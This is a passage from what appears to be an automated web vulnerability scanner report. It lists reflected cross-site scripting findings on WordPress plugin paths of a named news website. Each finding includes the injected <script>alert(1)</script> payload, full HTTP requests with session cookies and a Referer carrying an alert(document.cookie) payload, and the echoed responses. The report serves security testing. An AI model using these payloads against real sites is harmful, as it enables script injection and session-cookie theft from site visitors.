Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:53 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget/css/carbonite30e71\"><script>alert(1)</script>7fa7d2fe231/style.css?ver=1.0'; }); return true;" >
...[SNIP]...

4.226. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fda"><script>alert(1)</script>79aa2b78670 was submitted in the REST URL parameter 6. This input was echoed as 27fda\"><script>alert(1)</script>79aa2b78670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css27fda"><script>alert(1)</script>79aa2b78670?ver=1.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0ef95a81a72e24f1ca828c3010b7012d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:07 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css27fda\"><script>alert(1)</script>79aa2b78670?ver=1.0'; }); return true;" >
...[SNIP]...

4.227. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35285"><script>alert(1)</script>4225a2f4b94 was submitted in the REST URL parameter 1. This input was echoed as 35285\"><script>alert(1)</script>4225a2f4b94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content35285"><script>alert(1)</script>4225a2f4b94/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js?ver=1.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=53f120e61fbe82ad465b6082ab426c2b
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:25 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content35285\"><script>alert(1)</script>4225a2f4b94/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js?ver=1.1'; }); return true;" >
...[SNIP]...

4.228. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35731"><script>alert(1)</script>67b75d33874 was submitted in the REST URL parameter 2. This input was echoed as 35731\"><script>alert(1)</script>67b75d33874 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins35731"><script>alert(1)</script>67b75d33874/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js?ver=1.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=53f120e61fbe82ad465b6082ab426c2b
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:03 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins35731\"><script>alert(1)</script>67b75d33874/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js?ver=1.1'; }); return true;" >
...[SNIP]...

4.229. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58968"><script>alert(1)</script>a8c63a8d62 was submitted in the REST URL parameter 3. This input was echoed as 58968\"><script>alert(1)</script>a8c63a8d62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget58968"><script>alert(1)</script>a8c63a8d62/js/jquery.lwtCountdown-1.0.js?ver=1.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=53f120e61fbe82ad465b6082ab426c2b
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:42 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget58968\"><script>alert(1)</script>a8c63a8d62/js/jquery.lwtCountdown-1.0.js?ver=1.1'; }); return true;" >
...[SNIP]...

4.230. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c1b7"><script>alert(1)</script>8927d43b38f was submitted in the REST URL parameter 4. This input was echoed as 7c1b7\"><script>alert(1)</script>8927d43b38f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget/js7c1b7"><script>alert(1)</script>8927d43b38f/jquery.lwtCountdown-1.0.js?ver=1.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=53f120e61fbe82ad465b6082ab426c2b
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:14 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget/js7c1b7\"><script>alert(1)</script>8927d43b38f/jquery.lwtCountdown-1.0.js?ver=1.1'; }); return true;" >
...[SNIP]...

4.231. http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6386"><script>alert(1)</script>6097b69b7c9 was submitted in the REST URL parameter 5. This input was echoed as b6386\"><script>alert(1)</script>6097b69b7c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.jsb6386"><script>alert(1)</script>6097b69b7c9?ver=1.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=53f120e61fbe82ad465b6082ab426c2b
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:40 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.jsb6386\"><script>alert(1)</script>6097b69b7c9?ver=1.1'; }); return true;" >
...[SNIP]...

4.232. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee761"><script>alert(1)</script>77e6dcd8c2f was submitted in the REST URL parameter 1. This input was echoed as ee761\"><script>alert(1)</script>77e6dcd8c2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentee761"><script>alert(1)</script>77e6dcd8c2f/plugins/menu-manager/display/js/menu-manager.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:57 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentee761\"><script>alert(1)</script>77e6dcd8c2f/plugins/menu-manager/display/js/menu-manager.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.233. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce03d"><script>alert(1)</script>e9e57877bc8 was submitted in the REST URL parameter 2. This input was echoed as ce03d\"><script>alert(1)</script>e9e57877bc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsce03d"><script>alert(1)</script>e9e57877bc8/menu-manager/display/js/menu-manager.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:47 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsce03d\"><script>alert(1)</script>e9e57877bc8/menu-manager/display/js/menu-manager.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.234. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d675f"><script>alert(1)</script>1cc53769364 was submitted in the REST URL parameter 3. This input was echoed as d675f\"><script>alert(1)</script>1cc53769364 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-managerd675f"><script>alert(1)</script>1cc53769364/display/js/menu-manager.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:10:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-managerd675f\"><script>alert(1)</script>1cc53769364/display/js/menu-manager.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.235. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee29a"><script>alert(1)</script>587008800ec was submitted in the REST URL parameter 4. This input was echoed as ee29a\"><script>alert(1)</script>587008800ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/displayee29a"><script>alert(1)</script>587008800ec/js/menu-manager.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:04 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/displayee29a\"><script>alert(1)</script>587008800ec/js/menu-manager.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.236. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cc57"><script>alert(1)</script>10a34925f56 was submitted in the REST URL parameter 5. This input was echoed as 4cc57\"><script>alert(1)</script>10a34925f56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/js4cc57"><script>alert(1)</script>10a34925f56/menu-manager.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:43 GMT
Server: Apache/2.2.14 (Ubuntu)
